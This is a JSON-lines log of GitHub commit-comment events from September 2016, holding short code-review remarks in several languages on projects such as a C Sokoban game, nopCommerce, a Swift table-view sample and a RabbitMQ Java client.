{"id":"4579337338","type":"CommitCommentEvent","actor":{"login":"crumblingstatue"},"repo":{"name":"ShinraTensei/Sokoban"},"payload":{"comment":{"id":19069375,"position":15,"line":15,"path":"src/game.c","commit_id":"9f4e8921b58544da36a02ab4d53d552f0b267510","created_at":"2016-09-18T06:17:50Z","updated_at":"2016-09-18T06:17:50Z","body":"... here. Just saiyan."}},"created_at":"2016-09-18T06:17:50Z"}
{"id":"4579338139","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19069379,"position":null,"line":null,"path":null,"commit_id":"86a2f8820e6149dc992cb17ef5c50be6aa4822db","created_at":"2016-09-18T06:18:32Z","updated_at":"2016-09-18T06:18:32Z","body":"damn, I love this guy :+1: "}},"created_at":"2016-09-18T06:18:32Z"}
{"id":"4579339910","type":"CommitCommentEvent","actor":{"login":"siniStar7boy"},"repo":{"name":"XthemeOrg/Xtheme"},"payload":{"comment":{"id":19069388,"position":null,"line":null,"path":null,"commit_id":"71d281675777699e9cdec2ba6d4d40c91ecad6e4","created_at":"2016-09-18T06:20:06Z","updated_at":"2016-09-18T06:20:06Z","body":"- [ ] Update WIKI with this information in release 7.5.0"}},"created_at":"2016-09-18T06:20:06Z"}
{"id":"4579340466","type":"CommitCommentEvent","actor":{"login":"siniStar7boy"},"repo":{"name":"XthemeOrg/Xtheme"},"payload":{"comment":{"id":19069390,"position":null,"line":null,"path":null,"commit_id":"54c584dd58f0120ffee2e0de174e93ecac5070b5","created_at":"2016-09-18T06:20:28Z","updated_at":"2016-09-18T06:20:28Z","body":"- [ ] Update WIKI with this information in release 7.5.0"}},"created_at":"2016-09-18T06:20:28Z"}
{"id":"4579341009","type":"CommitCommentEvent","actor":{"login":"crumblingstatue"},"repo":{"name":"ShinraTensei/Sokoban"},"payload":{"comment":{"id":19069392,"position":28,"line":28,"path":"src/game.c","commit_id":"9f4e8921b58544da36a02ab4d53d552f0b267510","created_at":"2016-09-18T06:20:54Z","updated_at":"2016-09-18T06:20:54Z","body":"Do you think `IsRunning` is the best name for this function when it has a **gargantuan** side effect of polling the events and clearing the screen?"}},"created_at":"2016-09-18T06:20:54Z"}
{"id":"4579341931","type":"CommitCommentEvent","actor":{"login":"siniStar7boy"},"repo":{"name":"XthemeOrg/Xtheme"},"payload":{"comment":{"id":19069393,"position":null,"line":null,"path":null,"commit_id":"d282f53c244ac6f798cf778e69d19ea88006ec45","created_at":"2016-09-18T06:21:37Z","updated_at":"2016-09-18T06:21:37Z","body":"- [ ] Update WIKI with Proxyscan (dnsbl) section upon release 7.5.0"}},"created_at":"2016-09-18T06:21:37Z"}
{"id":"4579343338","type":"CommitCommentEvent","actor":{"login":"DpEpsilon"},"repo":{"name":"AndrewWPhillips/HexEdit"},"payload":{"comment":{"id":19069395,"position":null,"line":null,"path":null,"commit_id":"bf3f1e928eee7e5d87b243b8c0b5328517e1f0e7","created_at":"2016-09-18T06:22:46Z","updated_at":"2016-09-18T06:22:46Z","body":"@AndrewWPhillips I don't understand. When did I commit this? :P"}},"created_at":"2016-09-18T06:22:46Z"}
{"id":"4579343696","type":"CommitCommentEvent","actor":{"login":"senatov"},"repo":{"name":"senatov/log4jExcecisesJ2EE"},"payload":{"comment":{"id":19069397,"position":null,"line":null,"path":null,"commit_id":"091ce5bb16ac135cb6ff99da07a9219e526725bb","created_at":"2016-09-18T06:23:03Z","updated_at":"2016-09-18T06:23:03Z","body":"ok"}},"created_at":"2016-09-18T06:23:03Z"}
{"id":"4579343713","type":"CommitCommentEvent","actor":{"login":"alfaproject"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19069398,"position":null,"line":null,"path":null,"commit_id":"6503be51d6b1094086c2d7f623d256da66bec141","created_at":"2016-09-18T06:23:03Z","updated_at":"2016-09-18T06:23:03Z","body":"I see. Thanks for clarifying. (:"}},"created_at":"2016-09-18T06:23:03Z"}
{"id":"4579344070","type":"CommitCommentEvent","actor":{"login":"crumblingstatue"},"repo":{"name":"ShinraTensei/Sokoban"},"payload":{"comment":{"id":19069399,"position":15,"line":15,"path":"src/include/game.h","commit_id":"9f4e8921b58544da36a02ab4d53d552f0b267510","created_at":"2016-09-18T06:23:14Z","updated_at":"2016-09-18T06:23:14Z","body":"kek mixed styles.\r\nThe preceding fields are named in `CamelCase`, this one is named in `snake_case`."}},"created_at":"2016-09-18T06:23:14Z"}
{"id":"4579344530","type":"CommitCommentEvent","actor":{"login":"DpEpsilon"},"repo":{"name":"AndrewWPhillips/HexEdit"},"payload":{"comment":{"id":19069400,"position":null,"line":null,"path":null,"commit_id":"bf3f1e928eee7e5d87b243b8c0b5328517e1f0e7","created_at":"2016-09-18T06:23:39Z","updated_at":"2016-09-18T06:23:39Z","body":"In particular, when did I last have access to a Windows computer."}},"created_at":"2016-09-18T06:23:39Z"}
{"id":"4579345607","type":"CommitCommentEvent","actor":{"login":"crumblingstatue"},"repo":{"name":"ShinraTensei/Sokoban"},"payload":{"comment":{"id":19069404,"position":null,"line":null,"path":null,"commit_id":"9f4e8921b58544da36a02ab4d53d552f0b267510","created_at":"2016-09-18T06:24:29Z","updated_at":"2016-09-18T06:24:29Z","body":"Rest looks legit to me."}},"created_at":"2016-09-18T06:24:29Z"}
{"id":"4579347228","type":"CommitCommentEvent","actor":{"login":"crumblingstatue"},"repo":{"name":"ShinraTensei/Sokoban"},"payload":{"comment":{"id":19069406,"position":4,"line":4,"path":"CMakeLists.txt","commit_id":"9f4e8921b58544da36a02ab4d53d552f0b267510","created_at":"2016-09-18T06:25:47Z","updated_at":"2016-09-18T06:25:47Z","body":"Sugoi C11"}},"created_at":"2016-09-18T06:25:47Z"}
{"id":"4579347399","type":"CommitCommentEvent","actor":{"login":"crumblingstatue"},"repo":{"name":"ShinraTensei/Sokoban"},"payload":{"comment":{"id":19069408,"position":4,"line":4,"path":"CMakeLists.txt","commit_id":"9f4e8921b58544da36a02ab4d53d552f0b267510","created_at":"2016-09-18T06:25:54Z","updated_at":"2016-09-18T06:25:54Z","body":"Also noice warnings. :+1:"}},"created_at":"2016-09-18T06:25:54Z"}
{"id":"4579347666","type":"CommitCommentEvent","actor":{"login":"littlecodersh"},"repo":{"name":"littlecodersh/ItChat"},"payload":{"comment":{"id":19069409,"position":null,"line":null,"path":null,"commit_id":"4c2d3b83bc5a3bd1961cca3135e39886706c00eb","created_at":"2016-09-18T06:26:08Z","updated_at":"2016-09-18T06:26:08Z","body":"@wzxjohn 我发现是由于content文件没有被任何其他文件引用所以不会生成pyc导致了bug。\r\n且本地的环境在编写过程中曾经引用过content，产生了pyc导致bug通过了测试。\r\n但实际上我并不了解我这样修改是否是正确的用法。\r\n如果应当这样修改，那就会产生应确保模块中每一个文件都被内部引用过的奇特注意事项。\r\n这一点我没想到好的解决办法，希望能获得你的 建议！"}},"created_at":"2016-09-18T06:26:08Z"}
{"id":"4579348151","type":"CommitCommentEvent","actor":{"login":"bsclifton"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19069412,"position":null,"line":null,"path":null,"commit_id":"ec45bdfcdf76c81f60ac4d8185e5217998158e81","created_at":"2016-09-18T06:26:29Z","updated_at":"2016-09-18T06:26:29Z","body":"++ thanks :smile: "}},"created_at":"2016-09-18T06:26:29Z"}
{"id":"4579348210","type":"CommitCommentEvent","actor":{"login":"bgK"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19069413,"position":167,"line":2174,"path":"backends/graphics/surfacesdl/surfacesdl-graphics.cpp","commit_id":"05bc82b6225f79ad42e6259be8e227aed6e7c0dc","created_at":"2016-09-18T06:26:32Z","updated_at":"2016-09-18T06:26:32Z","body":"It is still necessary to ensure this method is not called during a GFX transaction because `endGFXTransaction` can free `_osdIconSurface`.\r\n\r\nI may have found a way to remove the cloud thread altogether so that this is not an issue anymore and the OpenGL OSD code can be simplified. More on this later."}},"created_at":"2016-09-18T06:26:32Z"}
{"id":"4579351413","type":"CommitCommentEvent","actor":{"login":"AndreiMaz"},"repo":{"name":"nopSolutions/nopCommerce"},"payload":{"comment":{"id":19069423,"position":105,"line":274,"path":"src/Plugins/Nop.Plugin.Pickup.PickupInStore/Controllers/PickupInStoreController.cs","commit_id":"1e6d3ecadb78c82ab33dbcdec67fafed5fcd16e0","created_at":"2016-09-18T06:29:07Z","updated_at":"2016-09-18T06:29:07Z","body":"этот метод лишний. у нас уже есть метод \"GetStatesByCountryId\" в CountryController (в Nop.Admin). его надо использовать"}},"created_at":"2016-09-18T06:29:07Z"}
{"id":"4579351632","type":"CommitCommentEvent","actor":{"login":"ryukinix"},"repo":{"name":"garnet-lang/garnet-lisp"},"payload":{"comment":{"id":19069425,"position":null,"line":null,"path":null,"commit_id":"c1681a17af211de27487d1624b1228caf3fb0104","created_at":"2016-09-18T06:29:19Z","updated_at":"2016-09-18T06:29:19Z","body":"Finally, @rafaelcn, @luiz_peres, @lubien. \r\n![screenshot_2016-09-18_03-28-48](https://cloud.githubusercontent.com/assets/7642878/18613381/131b2ce0-7d50-11e6-93ba-c079ee63742d.png)\r\n\r\n"}},"created_at":"2016-09-18T06:29:19Z"}
{"id":"4579351819","type":"CommitCommentEvent","actor":{"login":"AndreiMaz"},"repo":{"name":"nopSolutions/nopCommerce"},"payload":{"comment":{"id":19069430,"position":13,"line":27,"path":"src/Plugins/Nop.Plugin.Pickup.PickupInStore/Views/PickupInStore/_CreateOrUpdate.cshtml","commit_id":"1e6d3ecadb78c82ab33dbcdec67fafed5fcd16e0","created_at":"2016-09-18T06:29:29Z","updated_at":"2016-09-18T06:29:29Z","body":"вот тут надо вызывать метод от CountryController в Nop.Admin"}},"created_at":"2016-09-18T06:29:29Z"}
{"id":"4579352413","type":"CommitCommentEvent","actor":{"login":"bsclifton"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19069431,"position":null,"line":null,"path":null,"commit_id":"ad43443ecf37556c2f174a8598a8adc04a36859f","created_at":"2016-09-18T06:29:58Z","updated_at":"2016-09-18T06:29:58Z","body":"very nice! :smile:"}},"created_at":"2016-09-18T06:29:58Z"}
{"id":"4579353443","type":"CommitCommentEvent","actor":{"login":"AndreiMaz"},"repo":{"name":"nopSolutions/nopCommerce"},"payload":{"comment":{"id":19069434,"position":5,"line":41,"path":"src/Presentation/Nop.Web/Views/Checkout/OpcShippingAddress.cshtml","commit_id":"1e6d3ecadb78c82ab33dbcdec67fafed5fcd16e0","created_at":"2016-09-18T06:30:42Z","updated_at":"2016-09-18T06:30:42Z","body":"не проверял, но по ходу дела страна показываться не будет тут"}},"created_at":"2016-09-18T06:30:42Z"}
{"id":"4579353830","type":"CommitCommentEvent","actor":{"login":"AndreiMaz"},"repo":{"name":"nopSolutions/nopCommerce"},"payload":{"comment":{"id":19069436,"position":5,"line":65,"path":"src/Presentation/Nop.Web/Views/Checkout/ShippingAddress.cshtml","commit_id":"1e6d3ecadb78c82ab33dbcdec67fafed5fcd16e0","created_at":"2016-09-18T06:30:58Z","updated_at":"2016-09-18T06:30:58Z","body":"аналогично. страна не будет показываться"}},"created_at":"2016-09-18T06:30:58Z"}
{"id":"4579354051","type":"CommitCommentEvent","actor":{"login":"crumblingstatue"},"repo":{"name":"ShinraTensei/Sokoban"},"payload":{"comment":{"id":19069437,"position":3,"line":3,"path":"src/wall.c","commit_id":"b08bf11cb7d2feaa82a0d4e51fcbfb152cf5407e","created_at":"2016-09-18T06:31:08Z","updated_at":"2016-09-18T06:31:08Z","body":"y the underscored parameter names? You know that `kek.x` doesn't conflict with `x`, right?"}},"created_at":"2016-09-18T06:31:08Z"}
{"id":"4579355052","type":"CommitCommentEvent","actor":{"login":"crumblingstatue"},"repo":{"name":"ShinraTensei/Sokoban"},"payload":{"comment":{"id":19069438,"position":null,"line":null,"path":null,"commit_id":"3870422b72767d3501c1106a17591c11c37a8da9","created_at":"2016-09-18T06:31:59Z","updated_at":"2016-09-18T06:31:59Z","body":"kok'd"}},"created_at":"2016-09-18T06:31:59Z"}
{"id":"4579355972","type":"CommitCommentEvent","actor":{"login":"umdp"},"repo":{"name":"lfq7413/tomato"},"payload":{"comment":{"id":19069442,"position":43,"line":78,"path":"tomato.go","commit_id":"8a480d601839349134767c22b5700c08aca233d7","created_at":"2016-09-18T06:32:47Z","updated_at":"2016-09-18T06:32:47Z","body":"thanks a lot"}},"created_at":"2016-09-18T06:32:47Z"}
{"id":"4579357831","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19069444,"position":null,"line":null,"path":null,"commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T06:34:14Z","updated_at":"2016-09-18T06:34:14Z","body":"The titles are not quite right. All of the global pages included \" Pinball Map\" in some form in the title. So:\r\n\r\nDonate to Pinball Map\r\nProfile - Pinball Map\r\nStore - T-Shirts for Sale! - Pinball Map\r\nFAQ - Pinball Map\r\nApp - Pinball Map (actually, this one said \"Pinball Map App\")\r\n"}},"created_at":"2016-09-18T06:34:14Z"}
{"id":"4579359170","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19069449,"position":330,"line":330,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-18T06:35:18Z","updated_at":"2016-09-18T06:35:18Z","body":"注释写了有四种情况，为什么switch只判断了三种"}},"created_at":"2016-09-18T06:35:18Z"}
{"id":"4579360874","type":"CommitCommentEvent","actor":{"login":"ha1fha1f"},"repo":{"name":"aritaku/tableView_sample"},"payload":{"comment":{"id":19069455,"position":13,"line":13,"path":"tableview_cell_edit/Score.swift","commit_id":"12381d155e98d9f1532445e279ddd5d7952065ab","created_at":"2016-09-18T06:36:33Z","updated_at":"2016-09-18T06:36:33Z","body":"use type inference"}},"created_at":"2016-09-18T06:36:33Z"}
{"id":"4579361976","type":"CommitCommentEvent","actor":{"login":"ha1fha1f"},"repo":{"name":"aritaku/tableView_sample"},"payload":{"comment":{"id":19069463,"position":16,"line":16,"path":"tableview_cell_edit/DetailViewController.swift","commit_id":"12381d155e98d9f1532445e279ddd5d7952065ab","created_at":"2016-09-18T06:37:28Z","updated_at":"2016-09-18T06:37:28Z","body":"ditto\r\nuse type inference"}},"created_at":"2016-09-18T06:37:28Z"}
{"id":"4579361982","type":"CommitCommentEvent","actor":{"login":"ITE03050672"},"repo":{"name":"ITE03050672/Lab02"},"payload":{"comment":{"id":19069464,"position":null,"line":null,"path":null,"commit_id":"c879714abb9b49b256500627655aad8b9cb7a6ae","created_at":"2016-09-18T06:37:28Z","updated_at":"2016-09-18T06:37:28Z","body":"hello world MCU ITE"}},"created_at":"2016-09-18T06:37:28Z"}
{"id":"4579363557","type":"CommitCommentEvent","actor":{"login":"ha1fha1f"},"repo":{"name":"aritaku/tableView_sample"},"payload":{"comment":{"id":19069470,"position":18,"line":18,"path":"tableview_cell_edit/DetailViewController.swift","commit_id":"12381d155e98d9f1532445e279ddd5d7952065ab","created_at":"2016-09-18T06:38:50Z","updated_at":"2016-09-18T06:38:50Z","body":"I think `let` is better."}},"created_at":"2016-09-18T06:38:50Z"}
{"id":"4579363788","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19069472,"position":438,"line":438,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-18T06:39:02Z","updated_at":"2016-09-18T06:39:02Z","body":"Alert.show( error ,function(){\r\n +                Loading.hide();\r\n +            });\r\n +            dtd && dtd.reject();"}},"created_at":"2016-09-18T06:39:02Z"}
{"id":"4579364502","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19069474,"position":60,"line":60,"path":"app/views/pages/profile.html.haml","commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T06:39:38Z","updated_at":"2016-09-18T06:39:38Z","body":"That's strange. I don't think I wrote that inline html. I'm adjusting back to how I had it."}},"created_at":"2016-09-18T06:39:38Z"}
{"id":"4579365689","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19069477,"position":445,"line":445,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-18T06:40:33Z","updated_at":"2016-09-18T06:40:33Z","body":"Alert.show( error ,function(){\r\n                Loading.hide();\r\n            });\r\n            dtd && dtd.reject();\r\n这部分代码出现多次，可以提取成函数"}},"created_at":"2016-09-18T06:40:33Z"}
{"id":"4579366244","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19069479,"position":5,"line":17,"path":"app/views/pages/_header.html.haml","commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T06:41:01Z","updated_at":"2016-09-18T06:41:01Z","body":"I actually intentionally included \"Your Profile\" in the menu for non-logged in users because I wanted it to function as an incentive for them to sign up. Like, \"Oh I get a profile page?\""}},"created_at":"2016-09-18T06:41:01Z"}
{"id":"4579366444","type":"CommitCommentEvent","actor":{"login":"ha1fha1f"},"repo":{"name":"aritaku/tableView_sample"},"payload":{"comment":{"id":19069481,"position":42,"line":42,"path":"tableview_cell_edit/DetailViewController.swift","commit_id":"12381d155e98d9f1532445e279ddd5d7952065ab","created_at":"2016-09-18T06:41:13Z","updated_at":"2016-09-18T06:41:13Z","body":"IMO, \r\n\r\n```swift\r\nscoreArray[indexNumber] = Score(Int(textField.text!)!, date: nowDate)\r\n```\r\n\r\nis Better."}},"created_at":"2016-09-18T06:41:13Z"}
{"id":"4579366483","type":"CommitCommentEvent","actor":{"login":"tantan5"},"repo":{"name":"tantan5/our_project"},"payload":{"comment":{"id":19069482,"position":null,"line":null,"path":null,"commit_id":"35ca45e7fb0a5e0e44f23adffe94475c796c474b","created_at":"2016-09-18T06:41:14Z","updated_at":"2016-09-18T06:41:14Z","body":"リンクのmarkdown記法が間違ってる。\r\nhttp://qiita.com/Qiita/items/c686397e4a0f4f11683d"}},"created_at":"2016-09-18T06:41:14Z"}
{"id":"4579367973","type":"CommitCommentEvent","actor":{"login":"v1tal"},"repo":{"name":"v1tal/Toontown-Pulse"},"payload":{"comment":{"id":19069484,"position":4,"line":1943,"path":"otp/otpbase/OTPLocalizerEnglish.py","commit_id":"6fc6fdc16e7e07ea99d369cfc403eb8f7fc2a182","created_at":"2016-09-18T06:42:26Z","updated_at":"2016-09-18T06:42:26Z","body":"deadass i didnt write this some other dude who was helping me did"}},"created_at":"2016-09-18T06:42:26Z"}
{"id":"4579369398","type":"CommitCommentEvent","actor":{"login":"yvasilyev92"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":19069492,"position":null,"line":null,"path":null,"commit_id":"5204747e9378f65bf4a474da4b5c08f61a64d37c","created_at":"2016-09-18T06:43:32Z","updated_at":"2016-09-18T06:43:32Z","body":"For anyone having trouble with this part because of the deprecated functions I highly suggest you go to this link and follow the tutorial/implement it into your project.\r\n\r\n[http://stackoverflow.com/questions/23523806/how-do-you-create-preference-activity-and-preference-fragment-on-android](url)"}},"created_at":"2016-09-18T06:43:32Z"}
{"id":"4579371108","type":"CommitCommentEvent","actor":{"login":"ha1fha1f"},"repo":{"name":"aritaku/tableView_sample"},"payload":{"comment":{"id":19069495,"position":15,"line":15,"path":"tableview_cell_edit/ListViewController.swift","commit_id":"12381d155e98d9f1532445e279ddd5d7952065ab","created_at":"2016-09-18T06:44:55Z","updated_at":"2016-09-18T06:44:55Z","body":"use `let`"}},"created_at":"2016-09-18T06:44:55Z"}
{"id":"4579371986","type":"CommitCommentEvent","actor":{"login":"hungtseyee"},"repo":{"name":"netico-solutions/xdrv-spi"},"payload":{"comment":{"id":19069498,"position":null,"line":null,"path":null,"commit_id":"bf6577696f334f433d5d07f1368b078a080e0ad4","created_at":"2016-09-18T06:45:27Z","updated_at":"2016-09-18T06:45:27Z","body":"Hello, may I ask a question about \"disable in-kernel omap drivers\"? Why should disable these drivers and how to disable them (in menuconfig)? Thanks!"}},"created_at":"2016-09-18T06:45:27Z"}
{"id":"4579373687","type":"CommitCommentEvent","actor":{"login":"ha1fha1f"},"repo":{"name":"aritaku/tableView_sample"},"payload":{"comment":{"id":19069500,"position":23,"line":23,"path":"tableview_cell_edit/ListViewController.swift","commit_id":"12381d155e98d9f1532445e279ddd5d7952065ab","created_at":"2016-09-18T06:46:42Z","updated_at":"2016-09-18T06:46:42Z","body":"The identifier \"cell\" should be static member of this class, because you reference the name by raw-string multiple times in this class."}},"created_at":"2016-09-18T06:46:42Z"}
{"id":"4579374462","type":"CommitCommentEvent","actor":{"login":"meeeA"},"repo":{"name":"meeeA/our_project"},"payload":{"comment":{"id":19069503,"position":null,"line":null,"path":null,"commit_id":"e8af8b86d4449df23e2b5369db079eee58fc058f","created_at":"2016-09-18T06:47:17Z","updated_at":"2016-09-18T06:47:17Z","body":"edit & delete file"}},"created_at":"2016-09-18T06:47:17Z"}
{"id":"4579375867","type":"CommitCommentEvent","actor":{"login":"xi"},"repo":{"name":"ryersoncommunitytheatre/rct-constitution"},"payload":{"comment":{"id":19069508,"position":null,"line":null,"path":null,"commit_id":"23483b31459badc31002baf6ea4e28f20668e7d0","created_at":"2016-09-18T06:48:23Z","updated_at":"2016-09-18T06:48:23Z","body":"Please be more carefull with the `@` character on github .I got a lot of notifications because of the `@xi`."}},"created_at":"2016-09-18T06:48:23Z"}
{"id":"4579376765","type":"CommitCommentEvent","actor":{"login":"FriendFX"},"repo":{"name":"owncloud/owncloud.org"},"payload":{"comment":{"id":19069510,"position":null,"line":null,"path":null,"commit_id":"bc7f06b33a52eeadad254b00c49d3fb6e82513fd","created_at":"2016-09-18T06:49:07Z","updated_at":"2016-09-18T06:49:07Z","body":"Is this key [outdated](https://github.com/owncloud/owncloud.org/issues/272?_pjax=%23js-repo-pjax-container#issuecomment-247584157)?"}},"created_at":"2016-09-18T06:49:07Z"}
{"id":"4579377984","type":"CommitCommentEvent","actor":{"login":"MKRISH547"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19069515,"position":null,"line":null,"path":null,"commit_id":"25c0babb58d509c991a218c97fe6089ced25e1e8","created_at":"2016-09-18T06:50:04Z","updated_at":"2016-09-18T06:50:04Z","body":"//samelast program\r\nimport java.io.*;\r\nimport java.lang.*;\r\n class solution1\r\n {\r\n\tpublic void samelast(int x,int y)\r\n\t{\r\n\tboolean a = (x%10==y%10);\r\n\tSystem.out.println(a);\t  \r\n    }\r\n  }\r\n  class Testsolution\r\n  {\r\n\t   public static void main(String args[])throws IOException\r\n\t    {\r\n\t\t\t solution1 b=new solution1();\r\n\t\t\t b.samelast(25,37);\r\n\t\t}\t   \r\n  }"}},"created_at":"2016-09-18T06:50:04Z"}
{"id":"4579378344","type":"CommitCommentEvent","actor":{"login":"lucifer-tears"},"repo":{"name":"lucifer-tears/hello-world"},"payload":{"comment":{"id":19069516,"position":null,"line":null,"path":null,"commit_id":"5cbee9391e7f22cbcebc014d742a3d57f2c4807e","created_at":"2016-09-18T06:50:15Z","updated_at":"2016-09-18T06:50:15Z","body":"nihao  shijie"}},"created_at":"2016-09-18T06:50:15Z"}
{"id":"4579379268","type":"CommitCommentEvent","actor":{"login":"ha1fha1f"},"repo":{"name":"aritaku/tableView_sample"},"payload":{"comment":{"id":19069517,"position":40,"line":40,"path":"tableview_cell_edit/ListViewController.swift","commit_id":"12381d155e98d9f1532445e279ddd5d7952065ab","created_at":"2016-09-18T06:50:59Z","updated_at":"2016-09-18T06:50:59Z","body":"I don't think calling \"cell?\" multiple times is good way.\r\n\r\n```swift\r\nguard let cell = tableView.dequeueReusableCell(withIdentifier: \"cell\", for: indexPath) as? TableViewCell {\r\n    cell.dateLabel.text = String(describing: scoreData[indexPath.row].date)\r\n    cell.scoreLabel.text = String(scoreData[indexPath.row].point)\r\n    return cell\r\n}\r\nreturn TableViewCell()\r\n```\r\n\r\nis better, I think"}},"created_at":"2016-09-18T06:50:59Z"}
{"id":"4579379686","type":"CommitCommentEvent","actor":{"login":"webCoderLOL"},"repo":{"name":"opencv/opencv"},"payload":{"comment":{"id":19069519,"position":9,"line":153,"path":"cmake/OpenCVCompilerOptions.cmake","commit_id":"b2ad7cd9c018d9acf5e319e3f6a99651c0dca244","created_at":"2016-09-18T06:51:18Z","updated_at":"2016-09-18T06:51:18Z","body":"The command to build is \r\n` python opencv/platforms/ios/build_framework.py ios`\r\n\r\nHow do you specify to build using ARM compiler? After the build, i see\r\n\r\n~/Workspaces/opencv/ios/build$ ls\r\narm64-iPhoneOS         armv7s-iPhoneOS        x86_64-iPhoneSimulator\r\narmv7-iPhoneOS         i386-iPhoneSimulator\r\n\r\n~/Workspaces/opencv/ios$ ls\r\nbuild             opencv2.framework\r\n\r\nI assumed it was built successfully?"}},"created_at":"2016-09-18T06:51:18Z"}
{"id":"4579380271","type":"CommitCommentEvent","actor":{"login":"vikinghawk"},"repo":{"name":"vikinghawk/rabbitmq-java-client"},"payload":{"comment":{"id":19069523,"position":5,"line":45,"path":"src/main/java/com/rabbitmq/client/impl/TruncatedInputStream.java","commit_id":"a7eca2f226988ed32e5745f7f6092fdd80203b30","created_at":"2016-09-18T06:51:45Z","updated_at":"2016-09-18T06:51:45Z","body":"the mark and reset methods of parent FilterInputStream are synchronized so this fixes a findbug warning."}},"created_at":"2016-09-18T06:51:45Z"}
{"id":"4579380285","type":"CommitCommentEvent","actor":{"login":"875385283"},"repo":{"name":"zhangpanyi/encrypt-png"},"payload":{"comment":{"id":19069524,"position":null,"line":null,"path":null,"commit_id":"7afec1a0ec55795d9c60ff450796e8f3601b70fc","created_at":"2016-09-18T06:51:46Z","updated_at":"2016-09-18T06:51:46Z","body":"十分有用的工具 下载下来试试"}},"created_at":"2016-09-18T06:51:46Z"}
{"id":"4579380857","type":"CommitCommentEvent","actor":{"login":"vikinghawk"},"repo":{"name":"vikinghawk/rabbitmq-java-client"},"payload":{"comment":{"id":19069525,"position":40,"line":652,"path":"src/main/java/com/rabbitmq/client/impl/recovery/AutorecoveringChannel.java","commit_id":"a7eca2f226988ed32e5745f7f6092fdd80203b30","created_at":"2016-09-18T06:52:09Z","updated_at":"2016-09-18T06:52:09Z","body":"I need to remove this"}},"created_at":"2016-09-18T06:52:09Z"}
{"id":"4579381112","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19069527,"position":null,"line":null,"path":null,"commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T06:52:20Z","updated_at":"2016-09-18T06:52:20Z","body":"@lotem 終於搞定了，編譯都沒有問題了，再請幫忙看看。"}},"created_at":"2016-09-18T06:52:20Z"}
{"id":"4579381371","type":"CommitCommentEvent","actor":{"login":"vikinghawk"},"repo":{"name":"vikinghawk/rabbitmq-java-client"},"payload":{"comment":{"id":19069528,"position":27,"line":36,"path":"src/main/java/com/rabbitmq/client/impl/recovery/AutorecoveringChannel.java","commit_id":"a7eca2f226988ed32e5745f7f6092fdd80203b30","created_at":"2016-09-18T06:52:31Z","updated_at":"2016-09-18T06:52:31Z","body":"ChannelN was using CopyOnWriteArrayLists for these so I followed that pattern here as well."}},"created_at":"2016-09-18T06:52:31Z"}
{"id":"4579382291","type":"CommitCommentEvent","actor":{"login":"laohyx"},"repo":{"name":"laohyx/electsys"},"payload":{"comment":{"id":19069532,"position":null,"line":null,"path":null,"commit_id":"d84429c25061639b1e9a07cd56de2696bd074e45","created_at":"2016-09-18T06:53:11Z","updated_at":"2016-09-18T06:53:11Z","body":"LGTM"}},"created_at":"2016-09-18T06:53:11Z"}
{"id":"4579382640","type":"CommitCommentEvent","actor":{"login":"vikinghawk"},"repo":{"name":"vikinghawk/rabbitmq-java-client"},"payload":{"comment":{"id":19069533,"position":28,"line":67,"path":"src/main/java/com/rabbitmq/client/impl/recovery/AutorecoveringConnection.java","commit_id":"a7eca2f226988ed32e5745f7f6092fdd80203b30","created_at":"2016-09-18T06:53:26Z","updated_at":"2016-09-18T06:53:26Z","body":"fixed any potential threading and ConcurrentModification issues in this class. Lits are now synchronized and anywhere we iterator over a list it uses Utility.copy to make a copy before iterating"}},"created_at":"2016-09-18T06:53:26Z"}
{"id":"4579384170","type":"CommitCommentEvent","actor":{"login":"laohyx"},"repo":{"name":"laohyx/electsys"},"payload":{"comment":{"id":19069536,"position":null,"line":null,"path":null,"commit_id":"e9760c94b2564efc7c1876d2b81d7a7b77a4fdbd","created_at":"2016-09-18T06:54:35Z","updated_at":"2016-09-18T06:54:35Z","body":"LGTM"}},"created_at":"2016-09-18T06:54:35Z"}
{"id":"4579385096","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19069540,"position":16,"line":17,"path":"app/scripts/react/components/Cart/index.jsx","commit_id":"a3ba2aa53a4df4fa69ce22fe963c9b1f9c65640c","created_at":"2016-09-18T06:55:14Z","updated_at":"2016-09-18T06:55:14Z","body":"а зачем их создавать?"}},"created_at":"2016-09-18T06:55:14Z"}
